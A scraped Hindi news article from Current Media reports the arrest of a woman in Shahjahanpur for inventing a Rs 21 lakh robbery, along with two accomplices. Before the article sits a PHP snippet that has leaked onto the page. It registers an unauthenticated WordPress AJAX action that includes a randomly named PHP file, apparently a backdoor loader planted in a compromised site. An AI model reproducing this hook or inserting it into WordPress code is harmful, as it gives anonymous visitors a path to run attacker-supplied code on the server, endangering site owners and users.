if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"21 लाख रुपए की लूट की झूठी कहानी गढ़ने वाली महिला गिरफ्तार" - Current Media

“21 लाख रुपए की लूट की झूठी कहानी गढ़ने वाली महिला गिरफ्तार”

शाहजहांपुर। मो0 आफाक। उत्तर प्रदेश के शाहजहांपुर जिले में 21 लाख रुपए के लूट की झूठी कहानी गढ़ने के आरोप में पुलिस ने एक महिला तथा उसके दो साथियों को गिरफ्तार किया है।
पुलिस ने जानकारी देते हुए बताया कि सदर बाजार थाना क्षेत्र के चिनौर की रहने वाली सोनम सक्सेना (32) ने हाल ही में अपनी एक जमीन बेची थी और पेशगी के तौर पर उसे 21 लाख रुपये मिले थे। उन्होंने बताया कि रजनीश मिश्रा नामक व्यक्ति वह धनराशि देने के लिये महिला पर दबाव बना रहा था। इसी बीच, महिला ने पुलिस से शिकायत की कि रविवार रात अज्ञात लोगों ने उसका 21 लाख रुपए से भरा बैग लूट लिया है। पुलिस ने बताया कि सूचना मिलने पर पुलिस ने जांच शुरू की तो शिकायतकर्ता महिला सोनम पर ही शक हुआ। उससे पूछताछ की गयी तो उसने पुलिस को गुमराह करने की कोशिश की, इस पर सीसीटीवी फुटेज की जांच की गयी तो उसमें मामला फर्जी पाया गया। महिला से पूछताछ पर वह बैग बरामद हुआ तो उसमें किताबें भरी पायी गयीं।

पुलिस के मुताबिक सोनम ने पूछताछ में पुलिस को बताया कि रजनीश मिश्रा ने उसे जमीन खरीद कर दी थी और वह उसे बेचने से मिली रकम पर दावा कर रहा था। धनराशि उसे न देनी पड़े इसलिये महिला ने लूट की झूठी कहानी गढ़ी। पुलिस ने बताया कि महिला को गिरफ्तार कर लिया गया है साथ ही उसकी निशानदेही पर उसके साथियों शाकिब और कामरान को भी बृहस्पतिवार को गिरफ्तार कर लिया गया। सोनम ने बैग छीनने का नाटक करने के लिये आरोपियों को 40 हजार रुपये देने की बात कही थी और पेशगी के तौर पर उन्हें आठ हजार रुपये भी दिये थे।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

शांतिपूर्ण माहौल में अदा हुई ईद-उल-अज़हा की नमाज

शाहजहांपुर। मो0आफाक । शाहजहांपुर में ईद-उल-अजहा का त्योहार गुरुवार को शांतिपूर्ण और सौहार्दपूर्ण माहौल में …